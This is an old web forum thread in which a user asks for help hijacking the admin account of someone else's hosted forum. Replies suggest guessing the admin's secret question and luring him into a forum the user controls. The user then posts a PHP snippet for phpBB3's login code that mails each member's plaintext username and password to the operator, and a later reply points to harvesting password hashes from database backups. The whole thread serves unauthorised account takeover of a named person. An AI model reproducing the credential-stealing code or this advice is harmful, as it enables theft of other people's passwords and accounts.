Waraxe IT Security Portal
Login or Register
December 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 172
Members: 0
Total: 172
Full disclosure
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Hacking IPB 1.3 Final
Post new topicReply to topic View previous topic :: View next topic
Hacking IPB 1.3 Final
PostPosted: Sat Nov 22, 2008 6:39 am Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




I have tried for weeks... months now to hack this ipb forum. I have tried every exploit known to man. Could some one tell me what im doing wrong. I follow all teh directions do it right but i get an error like 'error: couldn't get a post key' or the hash is 00000000000000000000. So could someone point me in the right direction or just give me the password of the user TheGeneral, the root admin please. i would much appreciate it. Crying or Very sad

here is the site i want to be the admin of:

http://z13.invisionfree.com/Allied_Guardians/index.php?

Thanks in advance
View user's profile Send private message
PostPosted: Sun Nov 23, 2008 10:14 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




I write this many time, but nobody want to read.This is free IPB hosting,no chance to hack this guy's.
View user's profile Send private message
PostPosted: Tue Nov 25, 2008 1:23 am Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




Dam so now ill have to turn to social engineering. Got any programs to help me with that and techniques to get it to work?
View user's profile Send private message
PostPosted: Tue Nov 25, 2008 7:41 am Reply with quote
gyan007
Advanced user
Advanced user
Joined: Oct 17, 2008
Posts: 106




Nemesis wrote:
Dam so now ill have to turn to social engineering. Got any programs to help me with that and techniques to get it to work?


Get admin email, look up secret question to his email.
View user's profile Send private message
PostPosted: Tue Nov 25, 2008 7:32 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Social engineering does exactly what it says on the tin. Its social, so no, there are no programs to help you!

You could set up your own forum with a password stealer though that collects the post variables when anybody logs in and stores them in a file... then all you have to do is convince him to sign up Smile

Social engineering is a broad topic, there are countless ways of making it work which is why its my preferred method of hacking. It does involve skill and patience though (and experience always helps) as well as a good social understanding, which you don't need for running an off-the-mill exploit. A firm sociology and psychology knowledge never hurt anybody either =] Once you get to grips with it it is a valuable asset to any hacker.
View user's profile Send private message
PostPosted: Tue Nov 25, 2008 11:33 pm Reply with quote
gyan007
Advanced user
Advanced user
Joined: Oct 17, 2008
Posts: 106




Best way for social engineering = have something he/she wants or is interested in.
View user's profile Send private message
PostPosted: Wed Nov 26, 2008 1:24 am Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




lenny i did get him to sign up on my second forums which is phpbb 3 i believe. i thought that woudl be easier to hack but i have had no success. (He thinks i dont know he is on my forums we tricked him) So how can i do this can you help me?

Edit: from the admin pannel i can make phpbb 3 to phpbb 2 does that affect anything? like if phpbb2 exploits work cas i changed it from 3 to 2. also i have had no luck hacking my own made forum please help. And no news on the legal way of getting my forums back i dont think they care Sad
View user's profile Send private message
PostPosted: Wed Nov 26, 2008 2:04 am Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




[quote]I took that code, but changed it to work with phpBB3. I am testing with the "Olympus" Gold Release.

Instructions:
1.Open file phpbbroot/includes/functions.php in a text editor.
2. Find " $result = $auth->login($username, $password, $autologin, $viewonline, $admin); " (omit quotes)
3. After, add:
Code:
$sitename = "domain.tld";
$recipient = 'email@domain.tld';
$subject = 'Password Alert - domain.tld';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message);


4. Change domain.tld with the domain your using it on.
5. Change email@domain.tld with your email address.[/qoute]




this seems to be what i need but can someone help me use this? please sry for being noobish
Quote:
Quote:
Quote:
View user's profile Send private message
PostPosted: Wed Nov 26, 2008 10:23 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Ok, well i assume that you are self-hosting your phpBB installation... you are, right? :S

If not, your stuffed.

Actually thats not quite true. If you are using a hosting service then do you have the ability to download database backups? If you can get hold of your database (which will contain his hashed password) then you are in business =]
View user's profile Send private message
PostPosted: Thu Nov 27, 2008 6:03 pm Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




thanks for the response though im pretty sure someone else is hosting it for me. I dont know how to host it my self. but ill see what i can do.
View user's profile Send private message
PostPosted: Fri Nov 28, 2008 1:46 pm Reply with quote
_mranderson_
Valuable expert
Valuable expert
Joined: Oct 30, 2008
Posts: 51




Careful: most of the time, he won't use his main password to signup to another forum, so even after you have his password it doesn't mean you ll have access to his admin account. But if he's careless enough u ll get in.
View user's profile Send private message
PostPosted: Sat Nov 29, 2008 9:50 pm Reply with quote
Nemesis
Regular user
Regular user
Joined: Nov 22, 2008
Posts: 9




Ok well apparently i cant back up the forum i have now so could some tell me the best forum to use and how to host it myself so i can get an admins pass, assuming he is lazy and keeps all passes the same. thanks in advance.
View user's profile Send private message
Hacking IPB 1.3 Final
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.040 Seconds